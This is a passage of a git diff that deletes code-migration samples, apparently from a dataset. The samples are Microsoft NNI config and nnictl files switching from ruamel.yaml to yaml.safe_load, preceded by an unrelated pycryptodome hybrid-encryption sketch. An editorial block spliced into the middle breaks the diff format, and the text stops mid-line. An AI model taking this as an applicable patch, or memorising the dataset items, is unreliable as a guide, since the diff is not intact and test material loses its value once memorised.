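# drop-in fork pycryptodome (Cryptodome.*). A minimal, self-contained sketch
# of the same RSA-OAEP + AES-OCB hybrid pattern, assuming only that the
# pycryptodomex package is installed (it provides the Cryptodome namespace):
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import AES, PKCS1_OAEP
from Cryptodome.Random import get_random_bytes

rsa_key = RSA.generate(2048)                 # demo key pair
wrap = PKCS1_OAEP.new(rsa_key.publickey())   # RSA-OAEP wraps the AES key
aes_key = get_random_bytes(32)
wrapped_key = wrap.encrypt(aes_key)
enc = AES.new(aes_key, AES.MODE_OCB)         # OCB generates a random nonce
ciphertext, tag = enc.encrypt_and_digest(b'example plaintext')
# decryption side: unwrap the key, then verify-and-decrypt
aes_key2 = PKCS1_OAEP.new(rsa_key).decrypt(wrapped_key)
dec = AES.new(aes_key2, AES.MODE_OCB, nonce=enc.nonce)
assert dec.decrypt_and_verify(ciphertext, tag) == b'example plaintext'
# ---- end note ----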
- """ -- data = yaml.load(open(path), Loader=yaml.SafeLoader) -+ data = yaml.safe_load(open(path)) - if not isinstance(data, dict): - raise ValueError(f'Content of config file {path} is not a dict/object') - return cls(**data, _base_path=Path(path).parent) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py deleted file mode 100644 index 739adcb..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py +++ /dev/null @@ -1,153 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import copy -import dataclasses -from pathlib import Path -from typing import Any, Dict, Optional, Type, TypeVar - -import ruamel.yaml as yaml - -from . import util - -__all__ = ['ConfigBase', 'PathLike'] - -T = TypeVar('T', bound='ConfigBase') - -PathLike = util.PathLike - -def _is_missing(obj: Any) -> bool: - return isinstance(obj, type(dataclasses.MISSING)) - -class ConfigBase: - """ - Base class of config classes. - Subclass may override `_canonical_rules` and `_validation_rules`, - and `validate()` if the logic is complex. - """ - - # Rules to convert field value to canonical format. - # The key is field name. - # The value is callable `value -> canonical_value` - # It is not type-hinted so dataclass won't treat it as field - _canonical_rules = {} # type: ignore - - # Rules to validate field value. - # The key is field name. - # The value is callable `value -> valid` or `value -> (valid, error_message)` - # The rule will be called with canonical format and is only called when `value` is not None. - # `error_message` is used when `valid` is False. - # It will be prepended with class name and field name in exception message. - _validation_rules = {} # type: ignore - - def __init__(self, *, _base_path: Optional[Path] = None, **kwargs): - """ - Initialize a config object and set some fields. - Name of keyword arguments can either be snake_case or camelCase. - They will be converted to snake_case automatically. - If a field is missing and don't have default value, it will be set to `dataclasses.MISSING`. - """ - if 'basepath' in kwargs: - _base_path = kwargs.pop('basepath') - kwargs = {util.case_insensitive(key): value for key, value in kwargs.items()} - if _base_path is None: - _base_path = Path() - for field in dataclasses.fields(self): - value = kwargs.pop(util.case_insensitive(field.name), field.default) - if value is not None and not _is_missing(value): - # relative paths loaded from config file are not relative to pwd - if 'Path' in str(field.type): - value = Path(value).expanduser() - if not value.is_absolute(): - value = _base_path / value - setattr(self, field.name, value) - if kwargs: - cls = type(self).__name__ - fields = ', '.join(kwargs.keys()) - raise ValueError(f'{cls}: Unrecognized fields {fields}') - - @classmethod - def load(cls: Type[T], path: PathLike) -> T: - """ - Load config from YAML (or JSON) file. - Keys in YAML file can either be camelCase or snake_case. - """ - data = yaml.load(open(path), Loader=yaml.SafeLoader) - if not isinstance(data, dict): - raise ValueError(f'Content of config file {path} is not a dict/object') - return cls(**data, _base_path=Path(path).parent) - - def json(self) -> Dict[str, Any]: - """ - Convert config to JSON object. - The keys of returned object will be camelCase. 
- """ - self.validate() - return dataclasses.asdict( - self.canonical(), - dict_factory=lambda items: dict((util.camel_case(k), v) for k, v in items if v is not None) - ) - - def canonical(self: T) -> T: - """ - Returns a deep copy, where the fields supporting multiple formats are converted to the canonical format. - Noticeably, relative path may be converted to absolute path. - """ - ret = copy.deepcopy(self) - for field in dataclasses.fields(ret): - key, value = field.name, getattr(ret, field.name) - rule = ret._canonical_rules.get(key) - if rule is not None: - setattr(ret, key, rule(value)) - elif isinstance(value, ConfigBase): - setattr(ret, key, value.canonical()) - # value will be copied twice, should not be a performance issue anyway - elif isinstance(value, Path): - setattr(ret, key, str(value)) - return ret - - def validate(self) -> None: - """ - Validate the config object and raise Exception if it's ill-formed. - """ - class_name = type(self).__name__ - config = self.canonical() - - for field in dataclasses.fields(config): - key, value = field.name, getattr(config, field.name) - - # check existence - if _is_missing(value): - raise ValueError(f'{class_name}: {key} is not set') - - # check type (TODO) - type_name = str(field.type).replace('typing.', '') - optional = any([ - type_name.startswith('Optional['), - type_name.startswith('Union[') and 'NoneType' in type_name, - type_name == 'Any' - ]) - if value is None: - if optional: - continue - else: - raise ValueError(f'{class_name}: {key} cannot be None') - - # check value - rule = config._validation_rules.get(key) - if rule is not None: - try: - result = rule(value) - except Exception: - raise ValueError(f'{class_name}: {key} has bad value {repr(value)}') - - if isinstance(result, bool): - if not result: - raise ValueError(f'{class_name}: {key} ({repr(value)}) is out of range') - else: - if not result[0]: - raise ValueError(f'{class_name}: {key} {result[1]}') - - # check nested config - if isinstance(value, ConfigBase): - value.validate() diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py deleted file mode 100644 index ac7b602..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py +++ /dev/null @@ -1,153 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import copy -import dataclasses -from pathlib import Path -from typing import Any, Dict, Optional, Type, TypeVar - -import yaml - -from . import util - -__all__ = ['ConfigBase', 'PathLike'] - -T = TypeVar('T', bound='ConfigBase') - -PathLike = util.PathLike - -def _is_missing(obj: Any) -> bool: - return isinstance(obj, type(dataclasses.MISSING)) - -class ConfigBase: - """ - Base class of config classes. - Subclass may override `_canonical_rules` and `_validation_rules`, - and `validate()` if the logic is complex. - """ - - # Rules to convert field value to canonical format. - # The key is field name. - # The value is callable `value -> canonical_value` - # It is not type-hinted so dataclass won't treat it as field - _canonical_rules = {} # type: ignore - - # Rules to validate field value. - # The key is field name. - # The value is callable `value -> valid` or `value -> (valid, error_message)` - # The rule will be called with canonical format and is only called when `value` is not None. - # `error_message` is used when `valid` is False. 
- # It will be prepended with class name and field name in exception message. - _validation_rules = {} # type: ignore - - def __init__(self, *, _base_path: Optional[Path] = None, **kwargs): - """ - Initialize a config object and set some fields. - Name of keyword arguments can either be snake_case or camelCase. - They will be converted to snake_case automatically. - If a field is missing and don't have default value, it will be set to `dataclasses.MISSING`. - """ - if 'basepath' in kwargs: - _base_path = kwargs.pop('basepath') - kwargs = {util.case_insensitive(key): value for key, value in kwargs.items()} - if _base_path is None: - _base_path = Path() - for field in dataclasses.fields(self): - value = kwargs.pop(util.case_insensitive(field.name), field.default) - if value is not None and not _is_missing(value): - # relative paths loaded from config file are not relative to pwd - if 'Path' in str(field.type): - value = Path(value).expanduser() - if not value.is_absolute(): - value = _base_path / value - setattr(self, field.name, value) - if kwargs: - cls = type(self).__name__ - fields = ', '.join(kwargs.keys()) - raise ValueError(f'{cls}: Unrecognized fields {fields}') - - @classmethod - def load(cls: Type[T], path: PathLike) -> T: - """ - Load config from YAML (or JSON) file. - Keys in YAML file can either be camelCase or snake_case. - """ - data = yaml.safe_load(open(path)) - if not isinstance(data, dict): - raise ValueError(f'Content of config file {path} is not a dict/object') - return cls(**data, _base_path=Path(path).parent) - - def json(self) -> Dict[str, Any]: - """ - Convert config to JSON object. - The keys of returned object will be camelCase. - """ - self.validate() - return dataclasses.asdict( - self.canonical(), - dict_factory=lambda items: dict((util.camel_case(k), v) for k, v in items if v is not None) - ) - - def canonical(self: T) -> T: - """ - Returns a deep copy, where the fields supporting multiple formats are converted to the canonical format. - Noticeably, relative path may be converted to absolute path. - """ - ret = copy.deepcopy(self) - for field in dataclasses.fields(ret): - key, value = field.name, getattr(ret, field.name) - rule = ret._canonical_rules.get(key) - if rule is not None: - setattr(ret, key, rule(value)) - elif isinstance(value, ConfigBase): - setattr(ret, key, value.canonical()) - # value will be copied twice, should not be a performance issue anyway - elif isinstance(value, Path): - setattr(ret, key, str(value)) - return ret - - def validate(self) -> None: - """ - Validate the config object and raise Exception if it's ill-formed. 
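# ---- editorial note: illustrative sketch, not part of the original patch ----
# load() above is the heart of this migration: PyYAML's safe_load replaces
# the ruamel.yaml SafeLoader call shown in the diff hunk. A minimal
# equivalence check, assuming PyYAML is installed; config.yml is a
# hypothetical file:
import yaml  # PyYAML

with open('config.yml') as f:   # a context manager avoids the bare open(path)
    data = yaml.safe_load(f)    # same result as the old
                                # ruamel.yaml.load(f, Loader=ruamel.yaml.SafeLoader)
if not isinstance(data, dict):
    raise ValueError('config root must be a mapping')
# ---- end note ----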
- """ - class_name = type(self).__name__ - config = self.canonical() - - for field in dataclasses.fields(config): - key, value = field.name, getattr(config, field.name) - - # check existence - if _is_missing(value): - raise ValueError(f'{class_name}: {key} is not set') - - # check type (TODO) - type_name = str(field.type).replace('typing.', '') - optional = any([ - type_name.startswith('Optional['), - type_name.startswith('Union[') and 'NoneType' in type_name, - type_name == 'Any' - ]) - if value is None: - if optional: - continue - else: - raise ValueError(f'{class_name}: {key} cannot be None') - - # check value - rule = config._validation_rules.get(key) - if rule is not None: - try: - result = rule(value) - except Exception: - raise ValueError(f'{class_name}: {key} has bad value {repr(value)}') - - if isinstance(result, bool): - if not result: - raise ValueError(f'{class_name}: {key} ({repr(value)}) is out of range') - else: - if not result[0]: - raise ValueError(f'{class_name}: {key} {result[1]}') - - # check nested config - if isinstance(value, ConfigBase): - value.validate() diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff deleted file mode 100644 index 9d0b9ee..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/nni/experiment/config/common.py b/nni/experiment/config/common.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/experiment/config/common.py - +++ b/nni/experiment/config/common.py -@@ -5,7 +5,7 @@ from dataclasses import dataclass - from pathlib import Path - from typing import Any, Dict, List, Optional, Union - --from ruamel.yaml import YAML -+import yaml - - from .base import ConfigBase, PathLike - from . import util -@@ -118,7 +118,7 @@ class ExperimentConfig(ConfigBase): - def json(self) -> Dict[str, Any]: - obj = super().json() - if obj.get('searchSpaceFile'): -- obj['searchSpace'] = YAML().load(open(obj.pop('searchSpaceFile'))) -+ obj['searchSpace'] = yaml.safe_load(open(obj.pop('searchSpaceFile'))) - return obj - - ## End of public API ## diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py deleted file mode 100644 index 7143a85..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py +++ /dev/null @@ -1,189 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from dataclasses import dataclass -from pathlib import Path -from typing import Any, Dict, List, Optional, Union - -from ruamel.yaml import YAML - -from .base import ConfigBase, PathLike -from . 
import util - -__all__ = [ - 'ExperimentConfig', - 'AlgorithmConfig', - 'CustomAlgorithmConfig', - 'TrainingServiceConfig', -] - - -@dataclass(init=False) -class _AlgorithmConfig(ConfigBase): - name: Optional[str] = None - class_name: Optional[str] = None - code_directory: Optional[PathLike] = None - class_args: Optional[Dict[str, Any]] = None - - def validate(self): - super().validate() - _validate_algo(self) - -@dataclass(init=False) -class AlgorithmConfig(_AlgorithmConfig): - name: str - class_args: Optional[Dict[str, Any]] = None - -@dataclass(init=False) -class CustomAlgorithmConfig(_AlgorithmConfig): - class_name: str - class_directory: Optional[PathLike] = '.' - class_args: Optional[Dict[str, Any]] = None - - -class TrainingServiceConfig(ConfigBase): - platform: str - -class SharedStorageConfig(ConfigBase): - storage_type: str - local_mount_point: str - remote_mount_point: str - local_mounted: str - - -@dataclass(init=False) -class ExperimentConfig(ConfigBase): - experiment_name: Optional[str] = None - search_space_file: Optional[PathLike] = None - search_space: Any = None - trial_command: str - trial_code_directory: PathLike = '.' - trial_concurrency: int - trial_gpu_number: Optional[int] = None # TODO: in openpai cannot be None - max_experiment_duration: Optional[str] = None - max_trial_number: Optional[int] = None - nni_manager_ip: Optional[str] = None - use_annotation: bool = False - debug: bool = False - log_level: Optional[str] = None - experiment_working_directory: PathLike = '~/nni-experiments' - tuner_gpu_indices: Optional[Union[List[int], str]] = None - tuner: Optional[_AlgorithmConfig] = None - assessor: Optional[_AlgorithmConfig] = None - advisor: Optional[_AlgorithmConfig] = None - training_service: Union[TrainingServiceConfig, List[TrainingServiceConfig]] - shared_storage: Optional[SharedStorageConfig] = None - _deprecated: Optional[Dict[str, Any]] = None - - def __init__(self, training_service_platform: Optional[Union[str, List[str]]] = None, **kwargs): - base_path = kwargs.pop('_base_path', None) - kwargs = util.case_insensitive(kwargs) - if training_service_platform is not None: - assert 'trainingservice' not in kwargs - kwargs['trainingservice'] = util.training_service_config_factory( - platform=training_service_platform, - base_path=base_path - ) - elif isinstance(kwargs.get('trainingservice'), (dict, list)): - # dict means a single training service - # list means hybrid training service - kwargs['trainingservice'] = util.training_service_config_factory( - config=kwargs['trainingservice'], - base_path=base_path - ) - else: - raise RuntimeError('Unsupported Training service configuration!') - super().__init__(_base_path=base_path, **kwargs) - for algo_type in ['tuner', 'assessor', 'advisor']: - if isinstance(kwargs.get(algo_type), dict): - setattr(self, algo_type, _AlgorithmConfig(**kwargs.pop(algo_type))) - - def canonical(self): - ret = super().canonical() - if isinstance(ret.training_service, list): - for i, ts in enumerate(ret.training_service): - ret.training_service[i] = ts.canonical() - return ret - - def validate(self, initialized_tuner: bool = False) -> None: - super().validate() - if initialized_tuner: - _validate_for_exp(self.canonical()) - else: - _validate_for_nnictl(self.canonical()) - if self.trial_gpu_number and hasattr(self.training_service, 'use_active_gpu'): - if self.training_service.use_active_gpu is None: - raise ValueError('Please set "use_active_gpu"') - - def json(self) -> Dict[str, Any]: - obj = super().json() - if 
obj.get('searchSpaceFile'): - obj['searchSpace'] = YAML().load(open(obj.pop('searchSpaceFile'))) - return obj - -## End of public API ## - - @property - def _canonical_rules(self): - return _canonical_rules - - @property - def _validation_rules(self): - return _validation_rules - - -_canonical_rules = { - 'search_space_file': util.canonical_path, - 'trial_code_directory': util.canonical_path, - 'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None, - 'experiment_working_directory': util.canonical_path, - 'tuner_gpu_indices': lambda value: [int(idx) for idx in value.split(',')] if isinstance(value, str) else value, - 'tuner': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'assessor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'advisor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), -} - -_validation_rules = { - 'search_space_file': lambda value: (Path(value).is_file(), f'"{value}" does not exist or is not regular file'), - 'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'), - 'trial_concurrency': lambda value: value > 0, - 'trial_gpu_number': lambda value: value >= 0, - 'max_experiment_duration': lambda value: util.parse_time(value) > 0, - 'max_trial_number': lambda value: value > 0, - 'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"], - 'tuner_gpu_indices': lambda value: all(i >= 0 for i in value) and len(value) == len(set(value)), - 'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class') -} - -def _validate_for_exp(config: ExperimentConfig) -> None: - # validate experiment for nni.Experiment, where tuner is already initialized outside - if config.use_annotation: - raise ValueError('ExperimentConfig: annotation is not supported in this mode') - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.assessor, config.advisor) != 0: - raise ValueError('ExperimentConfig: tuner, assessor, and advisor must not be set in for this mode') - if config.tuner_gpu_indices is not None: - raise ValueError('ExperimentConfig: tuner_gpu_indices is not supported in this mode') - -def _validate_for_nnictl(config: ExperimentConfig) -> None: - # validate experiment for normal launching approach - if config.use_annotation: - if util.count(config.search_space, config.search_space_file) != 0: - raise ValueError('ExperimentConfig: search_space and search_space_file must not be set with annotationn') - else: - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.advisor) != 1: - raise ValueError('ExperimentConfig: tuner and advisor must be set one') - -def _validate_algo(algo: AlgorithmConfig) -> None: - if algo.name is None: - if algo.class_name is None: - raise ValueError('Missing algorithm name') - if algo.code_directory is not None and not Path(algo.code_directory).is_dir(): - raise ValueError(f'code_directory "{algo.code_directory}" does not exist or is not directory') - else: - if algo.class_name is not None or algo.code_directory is not None: - raise ValueError(f'When name is set for registered 
algorithm, class_name and code_directory cannot be used') - # TODO: verify algorithm installation and class args diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py deleted file mode 100644 index 3937c16..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py +++ /dev/null @@ -1,189 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from dataclasses import dataclass -from pathlib import Path -from typing import Any, Dict, List, Optional, Union - -import yaml - -from .base import ConfigBase, PathLike -from . import util - -__all__ = [ - 'ExperimentConfig', - 'AlgorithmConfig', - 'CustomAlgorithmConfig', - 'TrainingServiceConfig', -] - - -@dataclass(init=False) -class _AlgorithmConfig(ConfigBase): - name: Optional[str] = None - class_name: Optional[str] = None - code_directory: Optional[PathLike] = None - class_args: Optional[Dict[str, Any]] = None - - def validate(self): - super().validate() - _validate_algo(self) - -@dataclass(init=False) -class AlgorithmConfig(_AlgorithmConfig): - name: str - class_args: Optional[Dict[str, Any]] = None - -@dataclass(init=False) -class CustomAlgorithmConfig(_AlgorithmConfig): - class_name: str - class_directory: Optional[PathLike] = '.' - class_args: Optional[Dict[str, Any]] = None - - -class TrainingServiceConfig(ConfigBase): - platform: str - -class SharedStorageConfig(ConfigBase): - storage_type: str - local_mount_point: str - remote_mount_point: str - local_mounted: str - - -@dataclass(init=False) -class ExperimentConfig(ConfigBase): - experiment_name: Optional[str] = None - search_space_file: Optional[PathLike] = None - search_space: Any = None - trial_command: str - trial_code_directory: PathLike = '.' 
- trial_concurrency: int - trial_gpu_number: Optional[int] = None # TODO: in openpai cannot be None - max_experiment_duration: Optional[str] = None - max_trial_number: Optional[int] = None - nni_manager_ip: Optional[str] = None - use_annotation: bool = False - debug: bool = False - log_level: Optional[str] = None - experiment_working_directory: PathLike = '~/nni-experiments' - tuner_gpu_indices: Optional[Union[List[int], str]] = None - tuner: Optional[_AlgorithmConfig] = None - assessor: Optional[_AlgorithmConfig] = None - advisor: Optional[_AlgorithmConfig] = None - training_service: Union[TrainingServiceConfig, List[TrainingServiceConfig]] - shared_storage: Optional[SharedStorageConfig] = None - _deprecated: Optional[Dict[str, Any]] = None - - def __init__(self, training_service_platform: Optional[Union[str, List[str]]] = None, **kwargs): - base_path = kwargs.pop('_base_path', None) - kwargs = util.case_insensitive(kwargs) - if training_service_platform is not None: - assert 'trainingservice' not in kwargs - kwargs['trainingservice'] = util.training_service_config_factory( - platform=training_service_platform, - base_path=base_path - ) - elif isinstance(kwargs.get('trainingservice'), (dict, list)): - # dict means a single training service - # list means hybrid training service - kwargs['trainingservice'] = util.training_service_config_factory( - config=kwargs['trainingservice'], - base_path=base_path - ) - else: - raise RuntimeError('Unsupported Training service configuration!') - super().__init__(_base_path=base_path, **kwargs) - for algo_type in ['tuner', 'assessor', 'advisor']: - if isinstance(kwargs.get(algo_type), dict): - setattr(self, algo_type, _AlgorithmConfig(**kwargs.pop(algo_type))) - - def canonical(self): - ret = super().canonical() - if isinstance(ret.training_service, list): - for i, ts in enumerate(ret.training_service): - ret.training_service[i] = ts.canonical() - return ret - - def validate(self, initialized_tuner: bool = False) -> None: - super().validate() - if initialized_tuner: - _validate_for_exp(self.canonical()) - else: - _validate_for_nnictl(self.canonical()) - if self.trial_gpu_number and hasattr(self.training_service, 'use_active_gpu'): - if self.training_service.use_active_gpu is None: - raise ValueError('Please set "use_active_gpu"') - - def json(self) -> Dict[str, Any]: - obj = super().json() - if obj.get('searchSpaceFile'): - obj['searchSpace'] = yaml.safe_load(open(obj.pop('searchSpaceFile'))) - return obj - -## End of public API ## - - @property - def _canonical_rules(self): - return _canonical_rules - - @property - def _validation_rules(self): - return _validation_rules - - -_canonical_rules = { - 'search_space_file': util.canonical_path, - 'trial_code_directory': util.canonical_path, - 'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None, - 'experiment_working_directory': util.canonical_path, - 'tuner_gpu_indices': lambda value: [int(idx) for idx in value.split(',')] if isinstance(value, str) else value, - 'tuner': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'assessor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'advisor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), -} - -_validation_rules = { - 'search_space_file': lambda value: (Path(value).is_file(), f'"{value}" does not exist or is not regular file'), - 'trial_code_directory': lambda value: 
(Path(value).is_dir(), f'"{value}" does not exist or is not directory'), - 'trial_concurrency': lambda value: value > 0, - 'trial_gpu_number': lambda value: value >= 0, - 'max_experiment_duration': lambda value: util.parse_time(value) > 0, - 'max_trial_number': lambda value: value > 0, - 'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"], - 'tuner_gpu_indices': lambda value: all(i >= 0 for i in value) and len(value) == len(set(value)), - 'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class') -} - -def _validate_for_exp(config: ExperimentConfig) -> None: - # validate experiment for nni.Experiment, where tuner is already initialized outside - if config.use_annotation: - raise ValueError('ExperimentConfig: annotation is not supported in this mode') - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.assessor, config.advisor) != 0: - raise ValueError('ExperimentConfig: tuner, assessor, and advisor must not be set in for this mode') - if config.tuner_gpu_indices is not None: - raise ValueError('ExperimentConfig: tuner_gpu_indices is not supported in this mode') - -def _validate_for_nnictl(config: ExperimentConfig) -> None: - # validate experiment for normal launching approach - if config.use_annotation: - if util.count(config.search_space, config.search_space_file) != 0: - raise ValueError('ExperimentConfig: search_space and search_space_file must not be set with annotationn') - else: - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.advisor) != 1: - raise ValueError('ExperimentConfig: tuner and advisor must be set one') - -def _validate_algo(algo: AlgorithmConfig) -> None: - if algo.name is None: - if algo.class_name is None: - raise ValueError('Missing algorithm name') - if algo.code_directory is not None and not Path(algo.code_directory).is_dir(): - raise ValueError(f'code_directory "{algo.code_directory}" does not exist or is not directory') - else: - if algo.class_name is not None or algo.code_directory is not None: - raise ValueError(f'When name is set for registered algorithm, class_name and code_directory cannot be used') - # TODO: verify algorithm installation and class args diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff deleted file mode 100644 index cbe6ae8..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/nni/tools/nnictl/common_utils.py b/nni/tools/nnictl/common_utils.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/tools/nnictl/common_utils.py - +++ b/nni/tools/nnictl/common_utils.py -@@ -9,7 +9,7 @@ import time - import socket - import string - import random --import ruamel.yaml as yaml -+import yaml - import psutil - import filelock - import glob -@@ -21,7 +21,7 @@ def get_yml_content(file_path): - '''Load yaml file content''' - try: - with open(file_path, 'r') as file: -- return yaml.load(file, Loader=yaml.SafeLoader) -+ return yaml.safe_load(file) - except yaml.scanner.ScannerError as err: - print_error('yaml file format 
error!') - print_error(err) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py deleted file mode 100644 index 3667f8a..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py +++ /dev/null @@ -1,125 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import os -import sys -import json -import tempfile -import time -import socket -import string -import random -import ruamel.yaml as yaml -import psutil -import filelock -import glob -from colorama import Fore - -from .constants import ERROR_INFO, NORMAL_INFO, WARNING_INFO - -def get_yml_content(file_path): - '''Load yaml file content''' - try: - with open(file_path, 'r') as file: - return yaml.load(file, Loader=yaml.SafeLoader) - except yaml.scanner.ScannerError as err: - print_error('yaml file format error!') - print_error(err) - exit(1) - except Exception as exception: - print_error(exception) - exit(1) - -def get_json_content(file_path): - '''Load json file content''' - try: - with open(file_path, 'r') as file: - return json.load(file) - except TypeError as err: - print_error('json file format error!') - print_error(err) - return None - - -def print_error(*content): - '''Print error information to screen''' - print(Fore.RED + ERROR_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_green(*content): - '''Print information to screen in green''' - print(Fore.GREEN + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_normal(*content): - '''Print error information to screen''' - print(NORMAL_INFO, *content) - -def print_warning(*content): - '''Print warning information to screen''' - print(Fore.YELLOW + WARNING_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def detect_process(pid): - '''Detect if a process is alive''' - try: - process = psutil.Process(pid) - return process.is_running() - except: - return False - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - -def get_user(): - if sys.platform == 'win32': - return os.environ['USERNAME'] - else: - return os.environ['USER'] - -def generate_temp_dir(): - '''generate a temp folder''' - def generate_folder_name(): - return os.path.join(tempfile.gettempdir(), 'nni', ''.join(random.sample(string.ascii_letters + string.digits, 8))) - temp_dir = generate_folder_name() - while os.path.exists(temp_dir): - temp_dir = generate_folder_name() - os.makedirs(temp_dir) - return temp_dir - -class SimplePreemptiveLock(filelock.SoftFileLock): - '''this is a lock support check lock expiration, if you do not need check expiration, you can use SoftFileLock''' - def __init__(self, lock_file, stale=-1): - super(__class__, self).__init__(lock_file, timeout=-1) - self._lock_file_name = '{}.{}'.format(self._lock_file, os.getpid()) - self._stale = stale - - def _acquire(self): - open_mode = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_TRUNC - try: - lock_file_names = glob.glob(self._lock_file + '.*') - for file_name in lock_file_names: - if os.path.exists(file_name) and (self._stale < 0 or time.time() - os.stat(file_name).st_mtime < self._stale): - return None - fd = os.open(self._lock_file_name, open_mode) - except (IOError, OSError): - pass - else: - self._lock_file_fd = fd - return 
None - - def _release(self): - os.close(self._lock_file_fd) - self._lock_file_fd = None - try: - os.remove(self._lock_file_name) - except OSError: - pass - return None - -def get_file_lock(path: string, stale=-1): - return SimplePreemptiveLock(path + '.lock', stale=stale) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py deleted file mode 100644 index f322d31..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py +++ /dev/null @@ -1,125 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import os -import sys -import json -import tempfile -import time -import socket -import string -import random -import yaml -import psutil -import filelock -import glob -from colorama import Fore - -from .constants import ERROR_INFO, NORMAL_INFO, WARNING_INFO - -def get_yml_content(file_path): - '''Load yaml file content''' - try: - with open(file_path, 'r') as file: - return yaml.safe_load(file) - except yaml.scanner.ScannerError as err: - print_error('yaml file format error!') - print_error(err) - exit(1) - except Exception as exception: - print_error(exception) - exit(1) - -def get_json_content(file_path): - '''Load json file content''' - try: - with open(file_path, 'r') as file: - return json.load(file) - except TypeError as err: - print_error('json file format error!') - print_error(err) - return None - - -def print_error(*content): - '''Print error information to screen''' - print(Fore.RED + ERROR_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_green(*content): - '''Print information to screen in green''' - print(Fore.GREEN + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_normal(*content): - '''Print error information to screen''' - print(NORMAL_INFO, *content) - -def print_warning(*content): - '''Print warning information to screen''' - print(Fore.YELLOW + WARNING_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def detect_process(pid): - '''Detect if a process is alive''' - try: - process = psutil.Process(pid) - return process.is_running() - except: - return False - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - -def get_user(): - if sys.platform == 'win32': - return os.environ['USERNAME'] - else: - return os.environ['USER'] - -def generate_temp_dir(): - '''generate a temp folder''' - def generate_folder_name(): - return os.path.join(tempfile.gettempdir(), 'nni', 